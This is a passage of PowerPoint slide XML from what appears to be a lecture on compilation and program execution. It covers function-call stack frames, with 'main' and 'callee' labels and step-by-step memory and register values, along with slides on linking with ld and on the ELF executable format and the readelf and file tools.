                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>main</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-15555" y="2157984"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Right Bracket 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5206736" y="118804"/>
              <a:ext cx="763571" cy="5909348"/>
            </a:xfrm>
            <a:prstGeom prst="rightBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:headEnd type="none"/>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w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>callee</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="115615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45828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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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122</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0x28</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0xfd2b0</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0x8048397</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="115615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1622341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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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123</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0x28</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0xfd2b0</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0x804839a</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="142133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30436801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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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124</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0x28</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0xa</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0xfd2b0</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0x804839a</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="142133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00007549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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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125</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0x28</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0xa</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0xfd2b0</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0x804839d</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="168651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206180623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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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126</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0x32</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0xa</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0xfd2b0</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0x804839d</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="168651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98128046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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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127</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0x32</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0xa</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0xfd2b0</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0x80483a0</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="196083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85376590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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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128</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0x33</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0xa</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0xfd2b0</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0x80483a0</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="196083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55084827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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0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129</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0x33</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0xa</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0xfd2b0</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0x80483a3</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="223515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304922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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The linker combines the binary object with libraries, resolving references that the code has to external objects (e.g., functions) and creates the final executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The linker is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static linking is performed at compile-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic linking is performed at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common executable formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: PE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182823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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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130</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0x33</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0xa</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0xfd2b0</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0x80483a3</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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="223515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92965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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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131</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0x33</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0xa</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0xfd2b4</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0x80483a3</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="223515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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="35651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71958168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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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132</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0x33</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0xa</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0xfd2b4</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0x80483a3</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="223515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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="319937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7449208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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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133</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0x33</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0xa</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0xfd2b4</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0x80483a4</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="250947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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="319937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37326082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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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134</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0x33</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0xa</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0xfd2b4</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="250947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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="319937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38794827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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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135</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0x33</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0xa</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="250947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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="319937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27925059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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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136</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0x33</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0xa</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="250947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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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90599366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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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137</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0x33</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0xa</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="470403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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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2191493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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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138</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0x33</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0xa</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="470403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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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10460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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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139</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0x33</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0xa</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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c2</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="498749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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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65788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4306" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Executable and Linkable Format (ELF) is one of the most widely-used binary object formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF is architecture-independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF files are of four types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocatable: need to be fixed by the linker before being executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable: ready for execution (all symbols have been resolved with the exception of those related to shared libs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared: shared libraries with the appropriate linking information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core: core dumps created when a program terminated with a fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95254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43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43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43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43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943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9430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9430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943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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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140</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0x33</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0xa</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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c2</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="498749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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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12003772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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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141</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0x33</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0xa</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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c5</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="525267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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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77992854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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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142</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0x33</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0xa</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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c5</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="525267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0" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93432" y="283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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72162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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x33</a:t>
